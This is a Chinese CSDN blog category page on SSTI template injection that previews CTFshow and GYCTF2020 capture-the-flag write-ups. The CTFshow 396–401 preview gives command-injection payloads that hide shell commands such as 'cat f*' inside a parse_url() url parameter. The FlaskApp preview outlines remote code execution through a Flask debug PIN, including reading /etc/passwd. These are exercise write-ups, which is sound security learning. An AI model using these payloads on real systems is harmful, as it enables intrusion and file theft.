![](https://img-blog.csdnimg.cn/20201014180756926.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
SSTI模板注入
文章平均质量分 86
D.MIND
安全领域的小学生
展开
-
CTFshow——其他
396——parse_url()需要加上绝对路径/?url=http://ls;echo `ls`/var/www/html/2.txt/?url=http://ls;echo `cat f*`/var/www/html/3.txt397——parse_url()使用../迁移目录/?url=http://;echo `cat f*`/../var/www/html/1.txt398~401通杀了…?url=http://`cat f*`/../var/www/html/7.txt原创 2021-08-17 17:49:29 · 1234 阅读 · 1 评论 -
CTFshow——SSTI
首先一定要了解有关python类的知识:python __base__等内置方法python inspect模块解析# coding=utf-8__author__ = "leaves" class Base(object): a = 0 def __init__(self): self._a = 10 pass class Child(Base): "测试测试" _b = 10 def __str__(原创 2021-03-06 18:01:05 · 1916 阅读 · 2 评论 -
[GYCTF2020]FlaskApp
利用PIN码进行RCE折腾一下发现这个flask是开启了debug模式,能够查看报错信息,且发现了部分源码:PIN码RCE:输入PIN码进行认证后,可以在交互式Python shell中执行自定义Python代码生成PIN的关键值有如下几个服务器运行flask所登录的用户名。 通过读取/etc/passwd获得modname 一般不变就是flask.appgetattr(app, “name”, app.class.name)。python该值一般为Flask,值一般不变flask库原创 2021-03-30 16:36:38 · 399 阅读 · 0 评论